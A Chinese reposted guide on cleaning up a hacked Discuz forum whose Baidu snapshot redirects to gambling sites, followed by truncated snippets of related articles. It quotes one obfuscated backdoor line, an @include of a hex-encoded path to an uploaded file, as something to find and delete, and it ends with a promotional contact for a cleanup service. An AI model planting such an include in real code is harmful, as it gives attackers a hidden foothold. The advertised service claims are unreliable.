2. 程式人生 > >discuz被掛馬怎麼辦 discuz百度快照被劫持的解決辦法

discuz被掛馬怎麼辦 discuz百度快照被劫持的解決辦法

阿新 發佈:2018-11-13

discuz被掛馬怎麼辦 discuz百度快照被劫持的解決辦法

被劫持的表現為:

  在百度中輸入自己的網址,出現被收錄的帖子連結,點選後就跳轉到菠菜網站等。

下面講下如何解決該問題:

  進discuz後臺找到工具-檔案校驗,看下最近有哪些php檔案被修改了。

  1、排查網站原始檔的php 檔案,檢視是否有出現IP地址、或者異常網站(上面跳轉的網站),如果有刪除就可以了。

  2、排查網站原始檔的php 檔案,檢視是否有如下程式碼:@include($_SERVER[‘DOCUMENT_ROOT’]

  如果有就刪除此段程式碼。並把該段程式碼進行解密。

  舉例:@include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F646174612F6176617461722F30'));

  需要解密的程式碼為:2F646174612F6176617461722F30

  解密後為:/data/avatar/0

意思就是在上述路徑下存在被非法上傳的檔案,用於做快照劫持。

  解決辦法:刪除上面的程式碼和檔案即可。

  掛馬問題解決了後,記得更改伺服器相關的各種密碼,儘量設定的複雜一點。

      

      對於缺乏專業維護人員的網站,建議向  36O 網站管家 諮詢

       以上資料 轉載自 國內安全公司 36O網站管家

      已經完美解決 大家可以聯絡交流經驗 企鵝 或者威❤   613049616

相關推薦

discuz怎麼辦 discuz快照劫持解決辦法

discuz被掛馬怎麼辦 discuz百度快照被劫持的解決辦法 被劫持的表現為:   在百度中輸入自己的網址,出現被收錄的帖子連結,點選後就跳轉到菠菜網站等。 下面講下如何解決該問題:   進discuz後臺找到工具-檔案校驗,看下最近有哪些php檔案被修改了。   1、排查網站原始檔

網站***導致快照劫持跳轉到×××頁面的解決辦法

判斷 其他 tcp 特殊符號 就會 篡改 密碼 架構 函數 近期受世界杯的影響,我們Sinesafe接過很多中小企業網站頻繁的被×××***篡改了快照內容的網站安全問題導致打開網站被提示×××頁面,在搜索引擎中會被提示百度網址安全中心提醒您:該頁面可能已被非法篡改! 主要客

快照劫持 怎麼修復與排查

哥們的網站流量突然下降的很厲害,從原先一天500左右的IP,直接下降到80左右的IP,讓我幫忙看看,網站到底哪裡出了問題,首先我用百度的site:下網站的收錄量以及快照更新的時間,發現百度快照收錄的網站標題和實際標題不一樣,網站在百度的快照內容裡出現一些菠菜,彩票的內容,從百度點進去後直接跳轉到菠菜網站上去了

快照劫持 快速恢復快照解決辦法

哥們的網站流量突然下降的很厲害,從原先一天500左右的IP,直接下降到80左右的IP,讓我幫忙看看,網站到底哪裡出了問題,首先我用百度的site:下網站的收錄量以及快照更新的時間,發現百度快照收錄的網站標題和實際標題不一樣,網站在百度的快照內容裡出現一些菠菜,×××的內容,從百度點進去後直接跳轉到菠菜網站上去

快照劫持跳轉的解決辦法

哥們的網站流量突然下降的很厲害,從原先一天500左右的IP,直接下降到80左右的IP,讓我幫忙看看,網站到底哪裡出了問題,首先我用百度的site:下網站的收錄量以及快照更新的時間,發現百度快照收錄的網站標題和實際標題不一樣,網站在百度的快照內容裡出現一些菠菜,彩票的內容,從百度點進去後直接跳轉到菠菜

linux伺服器,ps命令netstat命令挾持替換成其他程式

公司一套hadoop叢集,裝的CDH CM,被掛馬了,動不動就特別卡,流量佔用特別高。當初為了方便,裸在公網上了。而且密碼還簡單,這下是血的教訓了。雖然上面已經同意了全部重灌了,但是本屌有點不甘心,想了解該病毒的老窩在哪。下面會一些資訊,分享給大家。 問題現象,lin

網站解決方法與分析如何會

運用 都沒有 使用 註意 In ext 一段 ××× 其他 如今絕大多數站長都在想著怎麽建設外鏈,怎麽發布網站內容,把自己網站的弄到首頁或是前三位,網站被掛馬的安全其實也需要站長們註意,因為一旦網站安全出了問題,網站的排名也會受到很大的影響。下面就仔細分析幾種關於網站安全的

記一次站點問題排查

源碼 yahoo 首頁 阿裏 zhang 並且 加密 體積 ref 起因,在下班準備回家之際,收到幾條朋友發來的信息,說他的網站在百度搜索做信息流廣告推廣,但是從百度搜索點擊打開就會跳轉的×××,讓我幫忙排查下問題,是不是被掛馬了,於是乎就開始了後面的故事 為了保護網站

網站反覆攻擊篡改的解決流程

網站被入侵之後,肯定會有一些後門,這些後門對網站安全非常危害,下面說下如何檢查網站的後門。 1.檢視網站的最後修改日期,看哪個檔案的修改日期“不和諧”   2.檢查程式完整性   現在一些程式,比如Discuz,Dedecms之類的都有檢查檔案完整性的選項,檢

網站快照劫持 網站收錄篡改成博彩內容的解決方法

很多使用者用dedecms織夢繫統,幫設計了一個網站,突然發現網站的流量越來越少,查看了一下,竟然發現網站快照被劫持了,網站快照標題和實際標題不一樣,快照被改成了博彩的內容,這才恍然明白,網站是被黑了。 網站的title標題被篡改,描述也被改成了博彩的關鍵詞,從百度搜索點選進網站直接跳轉到另一個網站上去

網站首頁總是別人黑掉 網站每天都 網站經常黑的處理辦法

最近幾天 小弟網站經常被人搞, 百度搜索直接提示危險了 玩了,  非常麻煩的事情, 解決要儘快, 遇到這問題後, 點進去直接跳其他的人網站 首頁加上了上百條黑鏈, 找 360網站管家公司 幫忙修復 看到首頁密密麻麻的黑鏈,第一反應就是頭大。 最簡單的辦法:格

網站每天都 網站經常黑的處理辦法 網站黑的恢復方法

有個朋友的網站長期沒有人管理,而網站PR=4,於是網站被人攻陷,首頁加上了上百條黑鏈, 找 網站管家 幫忙修復 看到首頁密密麻麻的黑鏈,第一反應就是頭大。 最簡單的辦法:格式化後重裝系統。但是這個伺服器web/資料庫都部署在同一臺上,資料規模有200多G,當初安裝的時候

高盛:騰訊、阿里和移出MSCI中國指數IT行業

圖片來源:視覺中國 20日,高盛表示,美國指數編制公司(MSCI)將在9月28日盤後對其GICS分類進行重大調整。高盛稱,本次調整中騰訊、阿里巴巴和百度等中國最大的科技公司將從MSCI中國指數中的IT行業分類中移出。 全球行業分類標準(GICS)是由標準普爾與摩根士丹利公司於1

阿里程式設計師跳槽, 卻頂替位置的新人噴程式碼爛: 人走還要鞭屍

現在的一些大廠的程式設計師,比如BAT等等,如果按照技術來說的話,彼此之間的差距都是不大的,因為都是在行業中的前列,就人才資源來說都是處在差不多的位置,而彼此之間的跳槽也已經成為了常事。 這不,近日就有網友發帖: 對此,有網友表示: 有網友認為,這是很正常的

某縣政府資訊網 haha exe

也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!                endurer 原創2007-03-09 第1版該資訊網首頁多處被加入程式碼:/---<iframe src=hxxp://www.ma***p*l**etan

解決網站快照內容篡改跳轉的問題

首先請各位網站運營者,檢查下網站從百度點選進去,是否跳轉到了惡意網站上了,直接輸入網址則不會跳轉的這個情況。再一個檢視網站在百度裡的首頁快照是否是自身網站的內容,如果出現一些跟網站不相關的內容。比如:惡意內容等的就可以判斷為網站被黑了,首頁裡含有虛假資訊是因為被攻擊者篡改了內

放假期間網站解決辦法

青島峰會期間本來想給自己放幾天假的,因為網站的掛馬給泡湯了,開啟網站首頁,使用瀏覽器的原始碼功能,發現自己網站的首頁多了很多木馬程式碼,於是我連線FTP檢視網站首頁的程式碼中發現了這個掛馬程式碼,下面我把程式碼貼出來 :<?phperror_reporting(0);i

伺服器的一般解決方法

伺服器被掛馬的原因很多,在解決之前,首先要弄清楚被掛馬的型別,比較常見的分為ARP掛馬和非ARP掛馬。先說說ARP掛馬吧,機房中了ARP的木馬,剛接觸到的朋友會覺得很神奇,在伺服器上看網站程式都沒有被注入的資訊,在外網訪問卻提示有病毒。這就是ARP掛馬的現象: (IE訪問時,站點被掛馬了,但是到伺服器上檢視實

最有效的防止伺服器的方法

伺服器有上傳漏洞,常規的辦法是設定存放檔案的資料夾的許可權為禁止執行,但對虛擬主機管理員來說很難,因為你不知道使用者上傳的網站中哪個資料夾是用來存放上傳檔案的。 有沒有更好的辦法呢? 相信所有的網站伺服器都有可以查殺木馬的防毒軟體,但為什麼還是被掛呢? 因為木馬經常用VBSc

網站實用怎麼解決辦法之一

 最近單位網站在百度搜索點選開啟都是黃色的,而直接輸入網址反而沒問題,在百度搜索中被提示為網站被黑的可能,很多客戶搜尋我們網站都進入了黃色網站,給公司的形象造成了很大的影響,作為公司的網站技術人員,以前也算是搞了5年的老站長了,什麼事沒驚著,從頭開始分析網站被黑的原因。百度的